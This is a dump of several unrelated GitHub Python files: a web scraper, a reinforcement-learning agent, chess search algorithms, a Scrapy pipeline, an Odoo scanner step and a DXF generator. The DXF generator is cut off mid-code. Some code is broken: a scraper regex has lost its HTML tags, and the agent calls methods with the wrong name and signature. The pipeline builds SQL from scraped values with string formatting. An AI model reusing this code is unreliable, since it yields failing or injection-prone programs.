+{"seq_id":"36106249726","text":"from collections import Counter\n\n\ndef main():\n class1 = [\"Alice\", \"Bob\", \"Charlie\", \"David\",\n \"Eve\", \"Charlie\", \"David\", \"Fred\"]\n class2 = [\"Fred\", \"Gary\", \"Helen\", \"Ivan\", \"Jack\", \"Helen\", \"Alice\"]\n\n c1 = Counter(class1)\n c2 = Counter(class2)\n\n c1.update(class2)\n print(c1)\n # Prints the total number of students in both classes presenting an individual count for each student\n print(sum(c1.values()))\n\n\n# THIS COUNTS THE WORDS IN A TEXT FILE\n# with open(\"texto.txt\", \"r\") as fp:\n# def count_words(text):\n# # print(Counter(text).most_common())\n# return (Counter(text.split()))\n\n# words = count_words(fp.read())\n\n# THIS READS A TEXT FILE AND PRINTS IT\nfp = open('texto.txt', 'r')\nfor i, line in enumerate(iter(fp.readline, '')):\n print(line)\n# THIS DOES IT TOO\n# with open('texto.txt', 'r') as file:\n# text = file.read()\n# print(text)\n","repo_name":"jayad23/study_py","sub_path":"counter_class.py","file_name":"counter_class.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74462401179","text":"import re,time,random\r\nfrom urllib import request,parse\r\n\r\nclass MaoYanSpider:\r\n def __init__(self):\r\n \"\"\"定义常用变量\"\"\"\r\n self.url = 'https://www.maoyan.com/board/4?offset={}'\r\n self.headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'}\r\n # 添加计数变量\r\n self.i = 0\r\n\r\n def get_html(self,url):\r\n \"\"\"获得响应内容\"\"\"\r\n req = request.Request(url = url,headers = self.headers)\r\n res = request.urlopen(req)\r\n html = res.read().decode('utf-8')\r\n \"\"\"直接调用解析函数\"\"\"\r\n self.parse_html(html)\r\n\r\n\r\n def parse_html(self,html):\r\n \"\"\"解析提取数据\"\"\"\r\n regex = '.*?title=\"(.*?)\".*?
(.*?)
.*?
(.*?)
'\r\n pattern = re.compile(regex,re.S) # 创建一个正则表达式的对象\r\n r_list = pattern.findall(html) # 元素类型是列表\r\n self.save_html(r_list)\r\n\r\n def save_html(self,r_list):\r\n \"\"\"数据处理函数\"\"\"\r\n # 制作一个空字典\r\n item = {}\r\n \"\"\" with open(filename,'w',encoding = 'utf-8') as f:\r\n f.write(html)\"\"\"\r\n for r in r_list:\r\n # 空字典的赋值操作\r\n item['name'] = r[0].strip() # strip()函数去除字符串左右两边的空格\r\n item['star'] = r[1].strip()\r\n item['time'] = r[2].strip()\r\n print(item)\r\n self.i += 1\r\n\r\n def run(self):\r\n \"\"\"函数入口\"\"\"\r\n for offset in range(10,91,10):\r\n url = self.url.format(offset) #拼接\r\n self.get_html(url) #数据抓取\r\n # 控制数据抓取频率\r\n time.sleep(random.randint(1,2))\r\n\r\nif __name__ == '__main__':\r\n spider = MaoYanSpider()\r\n spider.run()\r\n print(\"电影抓取的数量为:\",spider.i)\r\n\r\n\"\"\"\r\n
.*?title=\"(.*?)\".*?
(.*?)
.*?
(.*?)
\r\n\"\"\"\r\n\r\n\"\"\"\r\n
.*?title=\"(.*?)\".*?
(.*?)
.*?
(.*?)
\r\n\"\"\"","repo_name":"BanTanger/Initial-programming","sub_path":"py_Spider_project/07_maoyanspider.py","file_name":"07_maoyanspider.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"38932517102","text":"def MSBPosition(N) :\n \n msb_p = -1\n while (N) :\n N = N >> 1\n msb_p += 1\n \n return msb_p\n \n \n# Returns the Bitwise OR of all\n# integers between L and R\ndef findBitwiseOR(L, R) :\n \n res = 0\n \n # Find the MSB position in L\n msb_p1 = MSBPosition(L)\n \n # Find the MSB position in R\n msb_p2 = MSBPosition(R)\n \n while (msb_p1 == msb_p2) :\n res_val = (1 << msb_p1)\n \n # Add this value until msb_p1 and\n # msb_p2 are same;\n res += res_val\n \n L -= res_val\n R -= res_val\n \n # Calculate msb_p1 and msb_p2\n msb_p1 = MSBPosition(L)\n msb_p2 = MSBPosition(R)\n \n # Find the max of msb_p1 and msb_p2\n msb_p1 = max(msb_p1, msb_p2)\n \n # Set all the bits from msb_p1 upto\n # 0th bit in the result\n for i in range(msb_p1, -1, -1) :\n res_val = (1 << i)\n res += res_val\n \n return res\n \n \n# Driver Code\nif __name__ == \"__main__\" :\n \n L , R= 1,32767\n print(findBitwiseOR(L, R))\n ","repo_name":"Sandhya788/ss","sub_path":"bhavyashare/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35934783736","text":"import copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef init_weights(m):\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n nn.init.orthogonal_(m.weight)\n\n\nclass Actor(nn.Module):\n def __init__(self, state_dim, action_dim, max_action, image_obs, cnn):\n super(Actor, self).__init__()\n\n self.image_obs = image_obs\n self.cnn = cnn\n self.cnn_out = state_dim * 4 * 4\n if image_obs:\n state_dim = state_dim ** 2\n\n if image_obs and cnn:\n self.cnn = nn.Sequential(\n nn.Conv2d(1, 32, 8, stride=4, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 64, 4, stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(64, 64, 3, stride=1, padding=0),\n nn.ReLU(),\n )\n self.fcn = nn.Sequential(\n nn.Linear(self.cnn_out, 512),\n nn.ReLU(),\n nn.Linear(512, 256)\n )\n self.cnn.apply(init_weights)\n else:\n self.fcn = nn.Sequential(\n nn.Linear(state_dim, 256),\n nn.ReLU()\n )\n\n self.l1 = nn.Linear(256, 256)\n self.l2 = nn.Linear(256, action_dim)\n\n self.max_action = max_action\n\n def forward(self, state):\n if self.image_obs and self.cnn:\n state = self.cnn(state)\n state = state.view(-1, self.cnn_out)\n state = self.fcn(state)\n a = F.relu(self.l1(state))\n return self.max_action * torch.tanh(self.l2(a))\n\n\nclass Critic(nn.Module):\n def __init__(self, state_dim, action_dim, image_obs, cnn):\n super(Critic, self).__init__()\n\n self.image_obs = image_obs\n self.cnn = cnn\n self.cnn_out = state_dim * 4 * 4\n if image_obs:\n state_dim = state_dim ** 2\n\n if image_obs and cnn:\n self.cnn = nn.Sequential(\n nn.Conv2d(1, 32, 8, stride=4, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 64, 4, stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(64, 64, 3, stride=1, padding=0),\n nn.ReLU()\n )\n self.fcn_1 = nn.Sequential(\n nn.Linear(self.cnn_out + action_dim, 512),\n nn.ReLU(),\n nn.Linear(512, 256)\n )\n self.fcn_2 = nn.Sequential(\n nn.Linear(self.cnn_out + action_dim, 512),\n nn.ReLU(),\n nn.Linear(512, 256)\n )\n self.cnn.apply(init_weights)\n else:\n self.fcn_1 = nn.Sequential(\n nn.Linear(state_dim + action_dim, 256),\n nn.ReLU()\n )\n self.fcn_2 = nn.Sequential(\n nn.Linear(state_dim + action_dim, 256),\n nn.ReLU()\n )\n\n # Q1 architecture\n self.l1 = nn.Linear(256, 256)\n self.l2 = nn.Linear(256, 1)\n\n # Q2 architecture\n self.l3 = nn.Linear(256, 256)\n self.l4 = nn.Linear(256, 1)\n\n def forward(self, state, action):\n if self.image_obs and self.cnn:\n state = self.cnn(state)\n state = state.view(-1, self.cnn_out)\n sa = torch.cat([state, action], 1)\n else:\n sa = torch.cat([state, action], 1)\n\n q1 = self.fcn_1(sa)\n q1 = F.relu(self.l1(q1))\n q1 = self.l2(q1)\n\n q2 = self.fcn_2(sa)\n q2 = F.relu(self.l3(q2))\n q2 = self.l4(q2)\n return q1, q2\n\n def Q1(self, state, action):\n if self.image_obs and self.cnn:\n state = self.cnn(state)\n state = state.view(-1, self.cnn_out)\n sa = torch.cat([state, action], 1)\n else:\n sa = torch.cat([state, action], 1)\n\n q1 = self.fcn_1(sa)\n q1 = F.relu(self.l1(q1))\n q1 = self.l2(q1)\n return q1\n\n\n# Vanilla Variational Auto-Encoder\nclass VAE(nn.Module):\n def __init__(self, state_dim, action_dim, latent_dim, max_action, device):\n super(VAE, self).__init__()\n self.e1 = nn.Linear(state_dim + action_dim, 750)\n self.e2 = nn.Linear(750, 750)\n\n self.mean = nn.Linear(750, latent_dim)\n self.log_std = nn.Linear(750, latent_dim)\n\n self.d1 = nn.Linear(state_dim + latent_dim, 750)\n self.d2 = nn.Linear(750, 750)\n 
self.d3 = nn.Linear(750, action_dim)\n\n self.max_action = max_action\n self.latent_dim = latent_dim\n self.device = device\n\n def forward(self, state, action):\n z = F.relu(self.e1(torch.cat([state, action], 1)))\n z = F.relu(self.e2(z))\n\n mean = self.mean(z)\n # Clamped for numerical stability\n log_std = self.log_std(z).clamp(-4, 15)\n std = torch.exp(log_std)\n z = mean + std * torch.randn_like(std)\n\n u = self.decode(state, z)\n\n return u, mean, std\n\n def decode(self, state, z=None):\n # When sampling from the VAE, the latent vector is clipped to [-0.5, 0.5]\n if z is None:\n z = torch.randn((state.shape[0], self.latent_dim)).to(\n self.device).clamp(-0.5, 0.5)\n\n a = F.relu(self.d1(torch.cat([state, z], 1)))\n a = F.relu(self.d2(a))\n return self.max_action * torch.tanh(self.d3(a))\n\n\nclass BCQ(object):\n def __init__(self,\n state_dim,\n action_dim, max_action, discount=0.99, tau=0.005, lmbda=0.75, phi=0.05,\n policy_noise=0.2,\n noise_clip=0.5,\n policy_freq=2,\n cnn=False, image_obs=False):\n latent_dim = action_dim * 2\n\n self.actor = Actor(state_dim, action_dim, max_action,image_obs,cnn).to(device)\n self.actor_target = copy.deepcopy(self.actor)\n self.actor_optimizer = torch.optim.Adam(\n self.actor.parameters(), lr=1e-3)\n\n self.critic = Critic(state_dim, action_dim,image_obs,cnn).to(device)\n self.critic_target = copy.deepcopy(self.critic)\n self.critic_optimizer = torch.optim.Adam(\n self.critic.parameters(), lr=1e-3)\n\n self.vae = VAE(state_dim, action_dim, latent_dim,\n max_action, device).to(device)\n self.vae_optimizer = torch.optim.Adam(self.vae.parameters())\n\n self.max_action = max_action\n self.image_obs = image_obs\n self.cnn = cnn\n self.action_dim = action_dim\n self.discount = discount\n self.tau = tau\n self.lmbda = lmbda\n self.device = device\n self.policy_noise = policy_noise\n self.noise_clip = noise_clip\n self.policy_freq = policy_freq\n self.total_it = 0\n\n def select_action(self, state):\n with torch.no_grad():\n state = torch.FloatTensor(state.reshape(\n 1, -1)).repeat(100, 1).to(self.device)\n action = self.actor(state, self.vae.decode(state))\n q1 = self.critic.q1(state, action)\n ind = q1.argmax(0)\n return action[ind].cpu().data.numpy().flatten()\n\n def train(self, replay_buffer, iterations, batch_size=100):\n\n for it in range(iterations):\n # Sample replay buffer / batch\n state, action, next_state, reward, not_done = replay_buffer.sample(\n batch_size)\n\n # Variational Auto-Encoder Training\n recon, mean, std = self.vae(state, action)\n recon_loss = F.mse_loss(recon, action)\n KL_loss = -0.5 * (1 + torch.log(std.pow(2)) -\n mean.pow(2) - std.pow(2)).mean()\n vae_loss = recon_loss + 0.5 * KL_loss\n\n self.vae_optimizer.zero_grad()\n vae_loss.backward()\n self.vae_optimizer.step()\n\n # Critic Training\n with torch.no_grad():\n # Duplicate next state 10 times\n next_state = torch.repeat_interleave(next_state, 10, 0)\n\n # Compute value of perturbed actions sampled from the VAE\n target_Q1, target_Q2 = self.critic_target(\n next_state, self.actor_target(next_state, self.vae.decode(next_state)))\n\n # Soft Clipped Double Q-learning\n target_Q = self.lmbda * \\\n torch.min(target_Q1, target_Q2) + (1. 
-\n self.lmbda) * torch.max(target_Q1, target_Q2)\n # Take max over each action sampled from the VAE\n target_Q = target_Q.reshape(\n batch_size, -1).max(1)[0].reshape(-1, 1)\n\n target_Q = reward + not_done * self.discount * target_Q\n\n current_Q1, current_Q2 = self.critic(state, action)\n critic_loss = F.mse_loss(\n current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n # Pertubation Model / Action Training\n sampled_actions = self.vae.decode(state)\n perturbed_actions = self.actor(state, sampled_actions)\n\n # Update through DPG\n actor_loss = -self.critic.q1(state, perturbed_actions).mean()\n\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # Update Target Networks\n for param, target_param in zip(self.critic.parameters(), self.critic_target.parameters()):\n target_param.data.copy_(\n self.tau * param.data + (1 - self.tau) * target_param.data)\n\n for param, target_param in zip(self.actor.parameters(), self.actor_target.parameters()):\n target_param.data.copy_(\n self.tau * param.data + (1 - self.tau) * target_param.data)\n \n def save(self, filename):\n \n torch.save(self.critic.state_dict(), filename + \"_critic\")\n torch.save(self.critic_optimizer.state_dict(), filename + \"_critic_optimizer\")\n\n torch.save(self.actor.state_dict(), filename + \"_actor\")\n torch.save(self.actor_optimizer.state_dict(), filename + \"_actor_optimizer\")\n\n def load(self, filename):\n self.critic.load_state_dict(torch.load(filename + \"_critic\"))\n self.critic_optimizer.load_state_dict(torch.load(filename + \"_critic_optimizer\"))\n self.critic_target = copy.deepcopy(self.critic)\n\n self.actor.load_state_dict(torch.load(filename + \"_actor\"))\n self.actor_optimizer.load_state_dict(torch.load(filename + \"_actor_optimizer\"))\n self.actor_target = copy.deepcopy(self.actor)\n print(\"\\nloaded the model successfully\\n\")\n","repo_name":"Ingenious-c0der/Wildfire-Agents","sub_path":"gym_forestfire/agents/bcq.py","file_name":"bcq.py","file_ext":"py","file_size_in_byte":10801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17014316348","text":"import chess\n\nclass ChessHelper:\n @staticmethod\n def evaluate(gameState: chess.Board):\n pawn = 100\n knight = 300\n bishop = 300\n rook = 500\n queen = 900\n king = 2500\n mobilityWeight = 10\n \n whitepawns = len(gameState.pieces(1,1))\n whiteknights = len(gameState.pieces(2,1))\n whitebishops = len(gameState.pieces(3,1))\n whiterooks = len(gameState.pieces(4,1))\n whitequeens = len(gameState.pieces(5,1))\n whiteking = len(gameState.pieces(6,1))\n \n blackpawns = len(gameState.pieces(1,0))\n blackknights = len(gameState.pieces(2,0))\n blackbishops = len(gameState.pieces(3,0))\n blackrooks = len(gameState.pieces(4,0))\n blackqueens = len(gameState.pieces(5,0))\n blackking = len(gameState.pieces(6,0))\n \n whitematerial = pawn*whitepawns + knight*whiteknights + bishop*whitebishops + \\\n rook*whiterooks + queen*whitequeens +king*whiteking\n blackmaterial = pawn*blackpawns + knight*blackknights + bishop*blackbishops + \\\n rook*blackrooks + queen*blackqueens +king*blackking\n material = whitematerial - blackmaterial\n \n mobility1 = gameState.legal_moves.count()\n gameState.push(chess.Move.null())\n mobility2 = gameState.legal_moves.count()\n gameState.pop()\n if (gameState.turn == chess.WHITE):\n mobility = mobility1 - mobility2\n else:\n mobility = mobility2 - mobility1\n\n mobility = mobilityWeight * mobility\n return material + mobility\n def __init__(self, depth=2):\n self.depth = int(depth)\n\nclass NegaMax(ChessHelper):\n def getAction(self, gameState: chess.Board):\n def negamax(state: chess.Board, color, depth=self.depth):\n if depth == 0 or state.outcome() is not None:\n return None\n\n legalActions = state.legal_moves\n bestScore = float('-inf')\n bestAction = None\n\n for action in legalActions:\n state.push(action)\n score = -recursiveNegamax(state, -color, depth - 1)\n if score > bestScore:\n bestScore = score\n bestAction = action\n state.pop()\n return bestAction\n\n def recursiveNegamax(state: chess.Board, color, depth):\n if depth == 0 or state.outcome() is not None:\n return color * self.evaluate(state)\n\n legalActions = state.legal_moves\n bestScore = float('-inf')\n\n for action in legalActions:\n state.push(action)\n score = -recursiveNegamax(state, -color, depth - 1)\n bestScore = max(bestScore, score)\n state.pop()\n\n return bestScore\n\n color = 1 if gameState.turn else -1\n return negamax(gameState, color=color)\n\n\nclass NegaScout(ChessHelper):\n def getAction(self, gameState: chess.Board):\n def negascout(state: chess.Board, color, depth=self.depth, alpha=float('-inf'), beta=float('inf')):\n if depth == 0 or state.outcome() is not None:\n return None\n\n legalActions = state.legal_moves\n a = alpha\n b = beta\n isFirstMove = True\n bestAction = None\n\n for action in legalActions:\n state.push(action)\n score = negascoutRecursion(state, -color, depth - 1, -b, -alpha)\n if a < score < b and depth <= 2 and not isFirstMove:\n a = -negascoutRecursion(state, -color, depth - 1, -beta, -score)\n state.pop()\n if score > a:\n a = score\n bestAction = action\n\n if a >= beta:\n return action\n b = a + 1\n isFirstMove = False\n\n return bestAction\n\n def negascoutRecursion(state: chess.Board, color, depth, alpha, beta):\n if depth == 0 or state.outcome() is not None:\n return color * self.evaluate(state)\n\n legalActions = state.legal_moves\n a = alpha\n b = beta\n isFirstMove = True\n\n for action in legalActions:\n state.push(action)\n score = negascoutRecursion(state, -color, depth - 1, -b, -alpha)\n if a < score < b and depth <= 
2 and not isFirstMove:\n a = -negascoutRecursion(state, -color, depth - 1, -beta, -score)\n state.pop()\n a = max(a, score)\n if a >= beta:\n return a\n b = a + 1\n isFirstMove = False\n\n return a\n\n color = 1 if gameState.turn else -1\n return negascout(gameState, color=color)\n\n\nclass PVS(ChessHelper):\n\n def getAction(self, gameState: chess.Board):\n def pvs(state: chess.Board, color, depth=self.depth, alpha=float('-inf'), beta=float('inf')):\n if depth == 0 or state.outcome() is not None:\n return None\n\n legalActions = state.legal_moves\n bestAction = None\n\n bSearchPv = True\n for action in legalActions:\n state.push(action)\n if bSearchPv:\n score = -pvsRecursion(state, -color, depth - 1, -beta, -alpha)\n else:\n score = -pvsRecursion(state, -color, depth - 1, -alpha - 1, -alpha)\n if score > alpha:\n score = -pvsRecursion(state, -color, depth - 1, -beta, -alpha)\n state.pop()\n if score >= beta:\n return action\n if score > alpha:\n alpha = score\n bSearchPv = False\n bestAction = action\n\n return bestAction\n\n def pvsRecursion(state: chess.Board, color, depth, alpha, beta):\n if depth == 0 or state.outcome() is not None:\n return color * self.evaluate(state)\n\n legalActions = state.legal_moves\n bSearchPv = True\n\n for action in legalActions:\n state.push(action)\n if bSearchPv:\n score = -pvsRecursion(state, -color, depth - 1, -beta, -alpha)\n else:\n score = -pvsRecursion(state, -color, depth - 1, -alpha - 1, -alpha)\n if score > alpha:\n score = -pvsRecursion(state, -color, depth - 1, -beta, -alpha)\n state.pop()\n if score >= beta:\n return beta\n if score > alpha:\n alpha = score\n bSearchPv = False\n\n return alpha\n\n color = 1 if gameState.turn else -1\n return pvs(gameState, color=color)\n\nclass Game:\n def __init__(self, player, ai, p_color):\n self.gameState = chess.Board()\n\n if player == 1:\n self.player = NegaMax\n elif player == 2:\n self.player = NegaScout\n elif player == 3:\n self.player = PVS\n\n if ai == 1:\n self.ai = NegaMax\n elif ai == 2:\n self.ai = NegaScout\n elif ai == 3:\n self.ai = PVS\n\n self.p_color = p_color\n\n def nextMove(self):\n turn = self.gameState.turn\n if turn == self.p_color:\n self.makePlayerMove()\n else:\n self.makeAiMove()\n\n def makeAiMove(self):\n agent = self.ai(2)\n action = agent.getAction(self.gameState.copy())\n self.gameState.push(action)\n\n def makePlayerMove(self):\n agent = self.player(1)\n action = agent.getAction(self.gameState.copy())\n self.gameState.push(action)\n\n def isFinished(self):\n return self.gameState.outcome() is not None\n\n# 1 - negamax, 2 - negascout, 3 - pvs\n\ngame = Game(2, 1, 1)\ni = 1\nwhile not game.isFinished():\n print('========' + str(i) + '========')\n print(game.gameState)\n game.nextMove()\n i += 1\nprint(game.gameState.outcome())\n \n","repo_name":"Snakeheart404/lab3_piis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14432309146","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom .dao import db_module\n\nclass ZhilianPipeline(object):\n # table_name = u'worm_zhaopin'\n table_name = 'worm_zhaopin_company'\n def process_item(self, item, spider):\n sql = \"insert into {} set city='{}',name='{}',size='{}',nature='{}',industry='{}',website='{}',address='{}'\" \\\n \"\".format(self.table_name, item.get('city'), item.get('name'), item.get('size'), item.get('nature'), item.get('industry'),\n item.get('website'), item.get('address'))\n # sql = \"insert into {} set city='{}',job_name='{}',company_name='{}',place='{}',salary='{}',job_type='{}',\" \\\n # \"release_date='{}',feedback_rate='{}',numbers='{}',education='{}'\".format(self.table_name,\n # item['city'],\n # item['job_name'],\n # item['company_name'],\n # item['place'],\n # item['salary'],\n # item['job_type'],\n # item['release_date'],\n # item['feedback_rate'],\n # item['numbers'],\n # item['education'])\n db_module.execute_into(sql)\n return item\n# city = scrapy.Field()\n# name = scrapy.Field()\n# size = scrapy.Field()\n# nature = scrapy.Field()\n# industry = scrapy.Field()\n# website = scrapy.Field()\n# address = scrapy.Field()","repo_name":"ptechen/spider","sub_path":"spider_workspace/zhilian/zhilian/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73014252379","text":"# flake8: noqa\n'Use
or to retrieve the data transmitted by the scanner.'\n'Use or to retrieve the running terminal browse record.'\n'Put the returned action code in , as a single character.'\n'Put the returned result or message in , as a list of strings.'\n'Put the returned value in , as an integer'\n\nif tracer == 'loop':\n picking = env['stock.picking'].browse(terminal.reference_document)\n move = env['stock.move'].browse(int(terminal.get_tmp_value('tmp_val1')))\n quantity = float(terminal.get_tmp_value('tmp_val2'))\n location = env['stock.location'].search([('name', '=', message)])\n\n s_m_l = {\n 'picking_id': picking.id,\n 'product_id': move.product_id.id,\n 'move_id': move.id,\n 'product_uom_id' : move.product_uom.id,\n 'location_id': picking.location_id.id,\n 'location_dest_id': location.id,\n 'qty_done': quantity,\n }\n\n if terminal.get_tmp_value('tmp_val3'):\n s_m_l['lot_id'] = int(terminal.get_tmp_value('tmp_val3'))\n\n\n\n env['stock.move.line'].create(s_m_l)\n\n\nelif tracer == 'picking':\n picking = env['stock.picking'].search([('name', '=', message)])\n picking.move_lines.move_line_ids.unlink()\n terminal.reference_document = picking.id\nelse:\n picking = env['stock.picking'].browse(terminal.reference_document)\n\nact = 'L'\nres = [(move.id, '%g %s, %s' % (move.product_uom_qty - move.quantity_done, move.product_uom.name, move.product_id.name)) for move in picking.move_lines ]\n\nif not res:\n act = 'A'\n val = ''\nelse:\n res += [('', _('Terminate receipt'))]\n","repo_name":"gabosoftape/gabosoft_stock_scanner_receipt","sub_path":"data/Receipt/scanner_scenario_step_receipt_product_selection.py","file_name":"scanner_scenario_step_receipt_product_selection.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17387978872","text":"from ezdxf.addons import r12writer\nimport copy\n# TODO:\n# add circles to layer two cutout\n\nCM_IN_AN_INCH = 2.54\ndef inches_to_cm(inches):\n cm = inches*2.54\n return cm\n\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return f\"({self.x}, {self.y})\"\n\n def copy_and_add_additional_offset(self, additional_offset: 'Point'):\n return Point(self.x + additional_offset.x, self.y + additional_offset.y)\n\n def to_tuple(self):\n return (self.x, self.y)\n\n\nclass Circle:\n def __init__(self, radius, offset: Point):\n self.radius = radius\n self.centre_offset = offset\n\n def __repr__(self):\n return f\"Circle(radius: {self.radius}, centre: {self.centre_offset})\"\n\n def draw_dxf(self, dxf):\n dxf.add_circle(self.centre_offset.to_tuple(), radius=self.radius)\n\n def copy_and_add_additional_offset(self, additional_offset: 'Point'):\n return Circle(radius=self.radius, offset=self.centre_offset.copy_and_add_additional_offset(additional_offset))\n\n def max_x(self):\n return self.centre_offset.x + self.radius\n\n\nclass RectangleDimensions:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n def __repr__(self):\n return f\"({self.width} x {self.height})\"\n\nclass Rectangle():\n # Given the height and width of the rectangle, and the offset of the bottom left corner\n def __init__(self, rectangle_dimensions: RectangleDimensions, offset: Point):\n self.offset = offset\n self.rectangle_dimensions = rectangle_dimensions\n self.corners = self.find_corners()\n\n def __repr__(self):\n return f\"Rectangle({self.rectangle_dimensions}, offset: {self.offset}, corners: {self.corners})\"\n\n def find_corners(self):\n corner_one= self.offset\n corner_two = Point(self.offset.x, (self.offset.y + self.rectangle_dimensions.height))\n corner_three = Point((self.offset.x + self.rectangle_dimensions.width), (self.offset.y + self.rectangle_dimensions.height))\n corner_four = Point((self.offset.x + self.rectangle_dimensions.width), self.offset.y)\n return [corner_one, corner_two, corner_three, corner_four]\n\n def draw_dxf(self, dxf):\n dxf.add_line(self.corners[0].to_tuple(), self.corners[1].to_tuple())\n dxf.add_line(self.corners[1].to_tuple(), self.corners[2].to_tuple())\n dxf.add_line(self.corners[2].to_tuple(), self.corners[3].to_tuple())\n dxf.add_line(self.corners[3].to_tuple(), self.corners[0].to_tuple())# back to origin\n\n def max_x(self):\n x_values = []\n for corner in self.corners:\n x_values.append(corner.x)\n return max(x_values)\n\n def copy_and_add_additional_offset(self, additional_offset: Point):\n return Rectangle(self.rectangle_dimensions, self.offset.copy_and_add_additional_offset(additional_offset))\n\nclass Line:\n def __init__(self, start: Point, end: Point):\n self.start = start\n self.end = end\n\n def __repr__(self):\n return f\"Line({self.start} to {self.end})\"\n\n def draw_dxf(self, dxf):\n dxf.add_line(self.start.to_tuple(), self.end.to_tuple())\n\n def max_x(self):\n return max(self.start.x, self.end.x)\n\n def copy_and_add_additional_offset(self, additional_offset: Point):\n return Line(self.start.copy_and_add_additional_offset(additional_offset),\n self.end.copy_and_add_additional_offset(additional_offset))\n\n\n# The real world objects that define the size I can make the frame\nclass RealWorldObjects:\n def __init__(self, lino_width_inches, lino_height_inches,\n paper_border_inches=0.5):\n # The rectangle that represents the piece of lino I'll be printing from\n self.lino 
= RectangleDimensions(width=inches_to_cm(lino_width_inches), height=inches_to_cm(lino_height_inches))\n\n        # The rectangle that represents the paper I'll be printing onto.\n        # It is determined by the size of the lino print to go in it, and the\n        # size of the border I want around the print\n        _paper_width = self.lino.width + (2* inches_to_cm(paper_border_inches))\n        _paper_height = self.lino.height + (2* inches_to_cm(paper_border_inches))\n        self.paper = RectangleDimensions(width=_paper_width, height=_paper_height)\n\n        # The rectangle that represents the Ternes registration pins\n        self.registration_pin = RectangleDimensions(width=inches_to_cm(1.125), height=inches_to_cm(2.125))\n\n\ndef create_layers_for_printing_without_offset_between_layers(\n        real_world_objects: RealWorldObjects,\n        extra_space_around_paper_inches=1,\n        hinge_size=inches_to_cm(1),\n        circle_radius=inches_to_cm(1/16)):\n    _extra_space_around_paper=inches_to_cm(extra_space_around_paper_inches)\n\n    _extra_vertical_leeway_around_hinge_layer_three=inches_to_cm(1/8)\n    _extra_leeway_around_cutout_layer_three=inches_to_cm(1/8)\n\n    _base_rectangle = Rectangle(\n        RectangleDimensions(\n            # Extra space around paper is *2 as it's on both sides\n            width=real_world_objects.paper.width + (2*_extra_space_around_paper),\n            height=(\n                real_world_objects.paper.height +\n                (2*_extra_space_around_paper) +\n                # Want to be able to place the pin on the movable top piece (or the stationary section),\n                # with a bit of extra leeway given for the laser cut lines\n                (real_world_objects.registration_pin.height + _extra_vertical_leeway_around_hinge_layer_three) +\n                (hinge_size +_extra_vertical_leeway_around_hinge_layer_three)\n            )\n        ),\n        # The baselayer (layer one) is just the total size, so no offset needed\n        Point(0,0)\n    )\n\n    # Layer one is the background layer - the total size of the frame\n    _layer_one = [copy.deepcopy(_base_rectangle)]\n\n    # The layer to contain the lino - also has a cutout to fit the lino (with little circles on the corners for better fit)\n    _layer_two_base = copy.deepcopy(_base_rectangle)\n    _layer_two_cutout = Rectangle(\n        RectangleDimensions(\n            width=real_world_objects.lino.width,\n            height=real_world_objects.lino.height\n        ),\n        Point(\n            x=(_layer_two_base.rectangle_dimensions.width-real_world_objects.lino.width)/2,\n            # Same as x offset so the cutout is the same distance from the sides as it is\n            # from the edge of the frame furthest from the hinge\n            y=(_layer_two_base.rectangle_dimensions.width-real_world_objects.lino.width)/2\n        )\n    )\n    # _layer_two_circles_on_cutout_corners\n    _layer_two_cutout_corner_circles = []\n    for corner in _layer_two_cutout.corners:\n        _layer_two_cutout_corner_circles.append(Circle(radius=circle_radius, offset=corner))\n    _layer_two = [\n        _layer_two_base,\n        _layer_two_cutout\n    ] + _layer_two_cutout_corner_circles\n\n    # The third and top layer with a hinge - where the paper goes.\n    # Same outside shape, with an only very slightly larger cutout around the lino\n    # (just to keep it from interfering), and a line cut near the top to let it fold.\n    _layer_three_base = copy.deepcopy(_base_rectangle)\n    # Slightly larger cutout\n    _layer_three_cutout = Rectangle(\n        RectangleDimensions(\n            width= _layer_two_cutout.rectangle_dimensions.width + _extra_leeway_around_cutout_layer_three,\n            height= _layer_two_cutout.rectangle_dimensions.height + _extra_leeway_around_cutout_layer_three\n        ),\n        Point (\n            x=_layer_two_cutout.offset.x - (_extra_leeway_around_cutout_layer_three/2),\n            y=_layer_two_cutout.offset.y - 
